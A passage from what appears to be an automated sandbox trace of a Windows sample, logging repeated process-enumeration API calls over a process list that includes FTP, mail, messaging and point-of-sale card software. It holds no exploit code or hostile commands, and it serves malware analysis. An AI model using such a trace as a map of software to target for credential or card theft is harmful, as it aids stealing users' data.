lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.939] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0236.940] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.942] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.944] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.947] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.949] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0236.950] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0236.952] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0236.954] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0237.003] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0237.006] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0237.008] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0237.009] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0237.011] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0237.013] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0237.015] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0237.017] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0237.018] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0237.020] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0237.022] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0237.024] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0237.026] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0237.028] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0237.030] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0237.032] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0237.033] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0237.035] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0237.045] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0237.094] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0237.098] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0237.102] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0237.105] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0237.109] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0237.112] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0237.115] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0237.119] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0237.122] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0237.127] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0237.129] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0237.134] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0237.137] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0237.139] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0237.142] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0237.144] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0237.145] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0237.169] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0237.171] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0237.174] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0237.176] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0237.178] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0237.181] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0237.183] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0237.185] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0237.187] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0237.194] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0237.196] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0237.198] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0237.200] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0237.203] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0237.205] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0237.207] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0237.209] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0237.210] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0237.212] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0237.214] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0237.217] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0237.218] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0237.236] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0237.239] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0237.242] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.254] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0237.256] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0237.258] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.260] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0237.262] CloseHandle (hObject=0x2278) returned 1 [0237.262] Sleep (dwMilliseconds=0x64) [0237.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2290 [0237.414] Process32First (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.417] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0237.419] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0237.422] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.424] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0237.426] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.474] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0237.477] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0237.480] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0237.483] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, 